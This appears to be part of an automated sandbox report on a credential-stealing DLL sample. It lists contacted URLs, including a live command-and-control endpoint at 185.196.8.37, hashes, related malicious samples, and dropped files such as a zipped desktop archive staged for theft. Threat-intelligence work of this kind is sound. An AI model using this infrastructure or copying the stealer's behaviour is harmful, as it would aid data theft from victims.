          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000E.00000002.1356866325.000002C91ECF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1355712953.0000025AA83D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1401642278.00000191B37F8000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000016.00000002.1401642278.00000191B37F8000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://www.microsoft.copowershell.exe, 00000016.00000002.1570736869.00000191CB89A000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://contoso.com/Licensepowershell.exe, 00000016.00000002.1556863024.00000191C3645000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://contoso.com/Iconpowershell.exe, 00000016.00000002.1556863024.00000191C3645000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://185.196.8.37/5rundll32.exe, 00000007.00000002.1518302251.000001631549F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 0000000E.00000002.1356866325.000002C9200F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1355712953.0000025AA97DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1401642278.00000191B4BF4000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://185.196.8.37/Gd85kkjf/index.php?wal=1=rundll32.exe, 00000006.00000002.1514598239.000001E8C7BC0000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://185.196.8.37/Gd85kkjf/index.php?wal=1XyHrundll32.exe, 00000007.00000002.1518302251.000001631547B000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://185.196.8.37/Gd85kkjf/index.php?wal=1es5rundll32.exe, 00000006.00000002.1514598239.000001E8C7BC0000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://185.196.8.37/dsrundll32.exe, 00000006.00000002.1514598239.000001E8C7BC0000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/Pester/Pesterpowershell.exe, 00000016.00000002.1401642278.00000191B37F8000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://185.196.8.37/Gd85kkjf/index.php%rundll32.exe, 00000007.00000002.1518302251.000001631547B000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://185.196.8.37/lorer_RecentFileslrundll32.exe, 00000007.00000002.1518302251.0000016315491000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://185.196.8.37/Gd85kkjf/index.php#rundll32.exe, 00000007.00000002.1518302251.000001631547B000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://crl.mpowershell.exe, 00000016.00000002.1572082555.00000191CB91E000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://185.196.8.37/Gd85kkjf/index.php?wal=1srundll32.exe, 00000006.00000002.1514598239.000001E8C7BC0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000E.00000002.1356866325.000002C91ECF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1355712953.0000025AA83D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1401642278.00000191B37F8000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/powershell.exe, 00000016.00000002.1556863024.00000191C3645000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://nuget.org/nuget.exepowershell.exe, 0000000E.00000002.1356866325.000002C920496000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1419781847.0000025AB8226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1355712953.0000025AA9A8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1556863024.00000191C3645000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://185.196.8.37/t%rundll32.exe, 00000006.00000002.1514598239.000001E8C7BC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://aka.ms/pscore68powershell.exe, 0000000E.00000002.1356866325.000002C91EAD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1355712953.0000025AA81B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1401642278.00000191B35D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://185.196.8.37/Gd85kkjf/index.php?wal=1brundll32.exe, 00000007.00000002.1518302251.000001631549F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://185.196.8.37/Gd85kkjf/index.php?wal=1(rundll32.exe, 00000007.00000002.1518302251.000001631549F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000E.00000002.1356866325.000002C91EAD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1355712953.0000025AA81B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1401642278.00000191B35D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://185.196.8.37/Gd85kkjf/index.php?wal=1rerrundll32.exe, 00000007.00000002.1518302251.000001631549F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://185.196.8.37/rundll32.exe, 00000006.00000002.1514598239.000001E8C7BC0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1518302251.0000016315491000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    185.196.8.37
                                    		unknownSwitzerland
                                    		34888SIMPLECARRER2ITtrue

                                    General Information

                                    Joe Sandbox version:42.0.0 Malachite
                                    Analysis ID:1620559
                                    Start date and time:2025-02-21 01:51:22 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 5m 35s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:28
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:cred64.dll.dll
                                    (renamed file extension from exe to dll)
                                    Original Sample Name:cred64.dll.exe
                                    Detection:MAL
                                    Classification:mal100.phis.troj.spyw.evad.winDLL@32/22@0/1
                                    EGA Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 4
                                    • Number of non-executed functions: 0

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
                                    • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target powershell.exe, PID 6944 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtCreateKey calls found.
                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    19:52:21API Interceptor62x Sleep call for process: powershell.exe modified
                                    19:52:22API Interceptor1x Sleep call for process: loaddll64.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    185.196.8.37qzpTLn4c4B.exeGet hashmaliciousAmadeyBrowse
                                    • 185.196.8.37/Gd85kkjf/index.php

                                    Domains

                                    No context

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    SIMPLECARRER2ITcpainject.txt.ps1Get hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                    • 185.208.159.170
                                    Th2M2e7ZfY.exeGet hashmaliciousQuasarBrowse
                                    • 185.208.159.150
                                    https://steamescommnunity.com/s/10429109537Get hashmaliciousUnknownBrowse
                                    • 185.208.158.242
                                    https://steamecomrmunity.com/s/10423910953Get hashmaliciousUnknownBrowse
                                    • 185.208.158.242
                                    http://account.turnkeycashsite.com/Get hashmaliciousUnknownBrowse
                                    • 185.208.159.7
                                    BUDDA.exeGet hashmaliciousUnknownBrowse
                                    • 185.196.8.253
                                    selavi.exeGet hashmaliciousUnknownBrowse
                                    • 185.196.8.253
                                    wow.exeGet hashmaliciousAmadey, GhostRat, GuLoader, LummaC Stealer, XWorm, XmrigBrowse
                                    • 185.196.8.34
                                    z2ecqrLizP.exeGet hashmaliciousPureCrypter, AsyncRATBrowse
                                    • 185.208.159.240
                                    z2ecqrLizP.exeGet hashmaliciousPureCrypter, AsyncRATBrowse
                                    • 185.208.159.240

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):0.34726597513537405
                                    Encrypted:false
                                    SSDEEP:3:Nlll:Nll
                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                    Malicious:false
                                    Preview:@...e...........................................................

                                    C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):6146
                                    Entropy (8bit):7.7949601883616895
                                    Encrypted:false
                                    SSDEEP:96:gYx6IAzIcCJjMOLPPVjMOLPPjIy84RaN++3jkyFYnPvNQLwnq2nPvNQLwnq20Vu:vxKjCJvPNvP8y8Yatkx9E+ln9E+leu
                                    MD5:FFA1B7486EC340D9890A5E8D2465B6E8
                                    SHA1:EF7AB985B977D7DB25BDB02DEAD0058C7CF4EDF0
                                    SHA-256:82A1DA4F8433B62568CE31F37A5A52119311EBBBD2651E8F5B9106B8E15D38AD
                                    SHA-512:A3DF784D76236FA35D163A6143BF5FBD1BD481DAE65131CCBEC7D252B75FFACB669A01180BC2584F4A308B39AC20C0B85AD7AF9243247451992445DCC373B791
                                    Malicious:true
                                    Preview:PK.........3EW4............._Files_\NVWZAPQSQL.xlsx..In@1.C..z....d&...........Z.......3..T...Kfsn..h.9..3A.5%.Nek..?pG!....BDNJ...,7.P.g..9.z.....,......G..}.r.......&..l..q...+..cL..<...j...[..g.O.0......-.)..o...%...W.:..N....t]..vH1.;;.6..|a. ..hA..qxP..08..).5....X...{...?.GGW.%y..GV:.x...7.|.....x.j8..G.....oi}{...:.]5g...[...Z........s.....C...=|...|..GF]..P..y.HER|3....S_.9En...5.....N..~W(.f.d)....M....tMu..)...$.^............Z...a7".....n?.N!.\p./.p...!;..t...n...B......K....LQ&...).0..!W.2..s_.|m>!..Q...\....A..e..r...a4B..j../.W...L.5?r.Z.@|.r.W...P..j:+..X.U...u....A.......o..]....]4..zr..#..iy.......e4{.ffM.....6P^(<.~^...^-..W.l..j:]....PK.........3EW..............._Files_\PIVFAGEAAV.docx..G.E!...#.C...d...d."d..E.b....|j...I.3...Q-]?.8.h.0.Y.#...9.0.:o..D.rH|F..T.T.e..~......I.uu.............s..k.#7.E.M5pV..wY;/!-.c.>ZQ....\..Xj.....-........1Uq.,}.L..Xd..;.k..j?t./9........U...aM...?.T.....0..D..3..`g....u.H...{.E.Xb

                                    C:\Users\user\AppData\Local\Temp\_Files_\NVWZAPQSQL.xlsx

                                    Download File
                                    Process:C:\Windows\System32\rundll32.exe
                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1026
                                    Entropy (8bit):4.6998645060098685
                                    Encrypted:false
                                    SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                    MD5:1676F91570425F6566A5746BC8E8427E
                                    SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                    SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                    SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                    Malicious:false
                                    Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                    C:\Users\user\AppData\Local\Temp\_Files_\PIVFAGEAAV.docx

                                    Download File
                                    Process:C:\Windows\System32\rundll32.exe
                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1026
                                    Entropy (8bit):4.685942106278079
                                    Encrypted:false
                                    SSDEEP:24:e80g32tqxncx15PRgoZOZUxcz6oV0dh0dxiXMK:e87SH5Go0ZeuDufAiXMK
                                    MD5:3F6896A097F6B0AE6A2BF3826C813DFC
                                    SHA1:951214AB37DEA766005DD981B0B3D61F936B035B
                                    SHA-256:E6E3A92151EEE0FCDF549A607AE9E421E9BB081D7B060015A60865E69A2A3D60
                                    SHA-512:C7BD241F0E71DC29320CC051F649532FFF471B5E617B648CC495413587C06C236AFA4673A7BC77409E989260278CDEF49BDACA38BEB6AF65FEE74C563775B97C
                                    Malicious:false
                                    Preview:PIVFAGEAAVVMYOKLIHAGVKQSIBRMIEBPKZHRSRYSYCTZASSEWGQLTFYPITGFBLIMOSZPCOYJLDMIKUYRMFZNOVAKNNFUFMFWAQZIZZSOHPUKTMEQKVMZGORRHHUAPAVEHNTRHFTCOWUQLMTXHFAASXNSJOMVEVZKIBTYUEOEAYWORCLXNWXMWVTCVFUJOOHJFVBTQGYSPLVNZVQAKYRWBXASIFOBPMFAPMAVEFPAYEVCHLKOVGMAFTDZYSFCRVFLUCDEZSALOPZIFCHRCOADKGTQMGRAQFQVFLPTIZCOVQGXVCITLOKGAEHQOUDVVLBLANQIWAMALJXSPVCLVLGENZFIFSPDTQOOAOXTRKMORBXQQUMCVCGJNJNIYGXUUXANSJRSROPOUDFHQHUUMMRXDQWLRABBQAZENYVIBHRRHTGWSIVVUQDLCOQYLVPAUFYYHGIERJJLVMIHLHHCCGHRLMANSNVNAYHLENOWUETBHLULUXLDUIUWHDTSBTXYABZUPEVNUTYDIYOWXZQQWZTIKHRACSWYILZGJJAYPXSWVAJEAMWRWUWIOONUGSOWTNWVILBTRYWXPSGGJYETTQICCTQMOORSZENPULBEQOBSNDWJHFGZOXAYRMRTCQAGZFKLTXQJCKKKJTXRIIVBYSWRFFSDWLAWEVZNFVJIYAKGOFIKGKPALYKLUSFUZNXBTTGJQARLJLEPNMUPZBHUFERZBUARRWLRQMAELUFJHXEPWKNEOUOFWRPCGUFYJEWTUPSXMLBAGQWILTIUMBXONDPOFUHNKJJKISPTLDQHMYGKSUZUEBYHKNHJUVSBOBSFQWTBGVEFNVAAKMXTORQQDIBVTWEQECBUJMCLMNPNRTKIKGQQLCBXEDYYHZALQNWVUKKTUNZMKPSISXIDNZZXVGUERMWOJYWVPNSTVVUORBONVDVVOSICVUMWTQLGBVUNLJTMTSZIJARQMRHCGASSVBBFIRIMTSICIANQBRVHJQBP

                                    C:\Users\user\AppData\Local\Temp\_Files_\QCFWYSKMHA.docx

                                    Download File
                                    Process:C:\Windows\System32\rundll32.exe
                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1026
                                    Entropy (8bit):4.702247102869977
                                    Encrypted:false
                                    SSDEEP:24:GwASqxXUeo2spEcwb4NnVEBb2Ag1EY9TDqVEQXZvnIx+:nAD1U6+Lwb4dV42x1EIeVlXZ/5
                                    MD5:B734D7226D90E4FD8228EE89C7DD26DA
                                    SHA1:EDA7F371036A56A0DE687FF97B01F355C5060846
                                    SHA-256:ED3AE18072D12A2B031864F502B3DA672B4D4FA8743BEC8ADE114460F53C24D6
                                    SHA-512:D11ED908D0473A6BEA78D56D0E46FC05DAE642C6ED2F6D60F7859BB25C596CDAA79CC7883FEA5C175A2C04BD176943FF45670B19D6A55B3D5F29FAF40A19AC20
                                    Malicious:false
                                    Preview:QCFWYSKMHARLAFTMDAYCDPDNVLLXYAHYJQVDDKWMWZXTODMVQHOWYAKZGPKJEHLDEADLWAOYFHCRBONQYOLNJKXLXXPSVNNBUMGSSHSRYIKKLNWBJSSZQFZBFWIPYYALBWYXPUCHCBPPPRVICZHAAXDBSBDAFSJSLRPZCKMILDLKTZJTTJWTRDUXPIOSWYRPJKVLJAGHSGEPPERRAQLAJLIRGZPORRNBHIKYMYWHJJKNXIQOPDJPXFLFPWXDCSZYFDTACTIFVHTTSPLEYMJQGMJBZKBTPKCSRPHSAJZDKKKDYFDICXMYAQSFGBCKRXTFXXUYCXPOOHXIGGOZQXUOJXGUHUEOJLEOQQRFQRNQSWAOWAWOUVFMKBPTZVBCGRCYEHPXUWCDBHICKJYVGTNPPMEWNTSWYZNREIVBOXSICNBJXTOOMRYUPEHBVWMTIZHWLGFFTIUYFBQKZOWLOZMSGJFBUHXKMGISFGKCABOUUUQJAUODQPPYPQJGLZVADLCCGHPBEUWSDDXYCCQVTRQWCEJDTNAGHKGJTRWVAQBQJBUQWMJRXXASIQFFIUCPKMEXTJTVBDCBEYZDLKHCHQXMUBNRVRITBTYGULZYWAXVJAXNQEPONBFIAUWZCXQYHHPHZWKKUTNXAQELCSUFKXKKQLLKNVNOREOWTEVCFHSUGPNRMAPAFPTHPGPAJPOCFBZXTIYQYUSEJFOUEZDUJSRXDHTOZAMMNCCIXWLXFQZALVARMPTDBNFJAJUMFQAHUJVWMEIDRIMZQXYHMCNBVLONHTHCXFAKSQBBXFBBFYSTIWNRKGOIHMIHZKIQSYCSFIRGLYFATERWSKAZLTFNMKHFVBLMXNERMNYZHBEYHNFPIPCGHZZMBNNYITUETKSXMZHNSGROLAGIITATFDCBZCBLYQHHYFPBDWGCTQNYPHDHFBNVEJJDIVMSPKDXKQBUNSMLJDVGOKQUEVKEVEUUSGEQJDKGYLPIDXNBIPBAJRUU

                                    C:\Users\user\AppData\Local\Temp\_Files_\QCFWYSKMHA.xlsx

                                    Download File
                                    Process:C:\Windows\System32\rundll32.exe
                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1026
                                    Entropy (8bit):4.702247102869977
                                    Encrypted:false
                                    SSDEEP:24:GwASqxXUeo2spEcwb4NnVEBb2Ag1EY9TDqVEQXZvnIx+:nAD1U6+Lwb4dV42x1EIeVlXZ/5
                                    MD5:B734D7226D90E4FD8228EE89C7DD26DA
                                    SHA1:EDA7F371036A56A0DE687FF97B01F355C5060846
                                    SHA-256:ED3AE18072D12A2B031864F502B3DA672B4D4FA8743BEC8ADE114460F53C24D6
                                    SHA-512:D11ED908D0473A6BEA78D56D0E46FC05DAE642C6ED2F6D60F7859BB25C596CDAA79CC7883FEA5C175A2C04BD176943FF45670B19D6A55B3D5F29FAF40A19AC20
                                    Malicious:false
                                    Preview:QCFWYSKMHARLAFTMDAYCDPDNVLLXYAHYJQVDDKWMWZXTODMVQHOWYAKZGPKJEHLDEADLWAOYFHCRBONQYOLNJKXLXXPSVNNBUMGSSHSRYIKKLNWBJSSZQFZBFWIPYYALBWYXPUCHCBPPPRVICZHAAXDBSBDAFSJSLRPZCKMILDLKTZJTTJWTRDUXPIOSWYRPJKVLJAGHSGEPPERRAQLAJLIRGZPORRNBHIKYMYWHJJKNXIQOPDJPXFLFPWXDCSZYFDTACTIFVHTTSPLEYMJQGMJBZKBTPKCSRPHSAJZDKKKDYFDICXMYAQSFGBCKRXTFXXUYCXPOOHXIGGOZQXUOJXGUHUEOJLEOQQRFQRNQSWAOWAWOUVFMKBPTZVBCGRCYEHPXUWCDBHICKJYVGTNPPMEWNTSWYZNREIVBOXSICNBJXTOOMRYUPEHBVWMTIZHWLGFFTIUYFBQKZOWLOZMSGJFBUHXKMGISFGKCABOUUUQJAUODQPPYPQJGLZVADLCCGHPBEUWSDDXYCCQVTRQWCEJDTNAGHKGJTRWVAQBQJBUQWMJRXXASIQFFIUCPKMEXTJTVBDCBEYZDLKHCHQXMUBNRVRITBTYGULZYWAXVJAXNQEPONBFIAUWZCXQYHHPHZWKKUTNXAQELCSUFKXKKQLLKNVNOREOWTEVCFHSUGPNRMAPAFPTHPGPAJPOCFBZXTIYQYUSEJFOUEZDUJSRXDHTOZAMMNCCIXWLXFQZALVARMPTDBNFJAJUMFQAHUJVWMEIDRIMZQXYHMCNBVLONHTHCXFAKSQBBXFBBFYSTIWNRKGOIHMIHZKIQSYCSFIRGLYFATERWSKAZLTFNMKHFVBLMXNERMNYZHBEYHNFPIPCGHZZMBNNYITUETKSXMZHNSGROLAGIITATFDCBZCBLYQHHYFPBDWGCTQNYPHDHFBNVEJJDIVMSPKDXKQBUNSMLJDVGOKQUEVKEVEUUSGEQJDKGYLPIDXNBIPBAJRUU

                                    C:\Users\user\AppData\Local\Temp\_Files_\QNCYCDFIJJ.docx

                                    Download File
                                    Process:C:\Windows\System32\rundll32.exe
                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1026
                                    Entropy (8bit):4.6980379859154695
                                    Encrypted:false
                                    SSDEEP:24:A1cICRRGh4wXAyCbnhdKjiaeD+ICv1Ka42P:0cIYRGh4wXyny+VEV42P
                                    MD5:4E3F4BE1B97FA984F75F11D95B1C2602
                                    SHA1:C34EB2BF97AB4B0032A4BB92B9579B00514DC211
                                    SHA-256:59176791FFEBB86CD28FF283F163F0A44BEC33273968AADFF3852F383F07D1E1
                                    SHA-512:DD9C44C85AF10ED76900A2FE9289D28D99FB56CBE5385A46E485BE0F97A3EA7B119FE3235F334D84FA15902EA78F43C334424240B834D272849356421A33B207
                                    Malicious:false
                                    Preview:QNCYCDFIJJXXFOBBXUZWOFUQSSNNMFYIDILWLHTAZLHLJONMCDCVNCVXWBMUFJZAFKEEPNXZDYZJCSPOAMORBEETMACWAZGGTOXJCHTDTMVBHRPTLBCYZORACSZOXJZRVMZHVEOODGKJRRYLCKUFAYOXVKWJMPRNRNPZEPQZONIUXPPIZMRKSMXAPWYEFYYMMEVAXOVEZSPBEJXENHLIHXQMWJRNUJFILZBVCHZGSXSCZDLUJYAIEMFAKMGZRGVOACZDULPMTHUOBPJBMVYTDCJXFDPUECDSDSUEAFWGDFBMYZQEFBBNQHNIAZWLZMSUFKUWZABFJATHSHQHDIAVRZTRYPZQQLMBOTPFBQKJDTMNKBJAFYFAYVOMBSWHOBUQSYEBLHEDVKQNGPPYYDHQTDNFMKYJBWQRTHICJRWSTTREOOBMYGBUCHFDYMGHVLBDKHYWLYGTEDTHOSIOSXLWGESBKVKNDNLHUVLLUBIQJIAQTVGZHJBFRBPSLHGPZGCZVLETNOSXQRRSQJBXTKDASBHEZXYVHEIZXGANNJHMIMQYHDFNNALGZYXGCPYFPYZSCSPKUMVVWIRDXSMSGEKGZNWWWVXGTXWDKSTXVLHRXFELLCWRSIFVJLOUVSMBXWSHSPQZUHHYPANCFLOAYKMMBXMIXYFORAFUEVNVTQFWGSCJZEOHRNDHLLFYLQFOZXARKDDGYWBOFNOCUJWZALYSUEUOMQHCYTBHPYEDSSAKKDECQAZIWWHOJPIMNYUNNZPDBNECENBWFCTSDYUMRCXDFCNYFVTFUUWRGBGWUGZTYCTBQVNAVSKZCNNOJNXDSQUTVJLYJMHLQJJBPEDZOTOVFCJLUVQVIEYTFNEEDHKMXTEKAIHTQBGOPUGKWWNQTAGBHAUZVKMHWVZTYKYOWJYFEGCIPREWFGAHFXDMSFOAYRDJCTSGYNSDSELZDMIXRNFGOTYBEUKLAOAVMHJKZEBGSCQHGCDZCAAGIVBGWEQA

                                    C:\Users\user\AppData\Local\Temp\_Files_\SQSJKEBWDT.xlsx

                                    Download File
                                    Process:C:\Windows\System32\rundll32.exe
                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1026
                                    Entropy (8bit):4.698473196318807
                                    Encrypted:false
                                    SSDEEP:24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
                                    MD5:4D0D308F391353530363283961DF2C54
                                    SHA1:59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
                                    SHA-256:6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
                                    SHA-512:DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
                                    Malicious:false
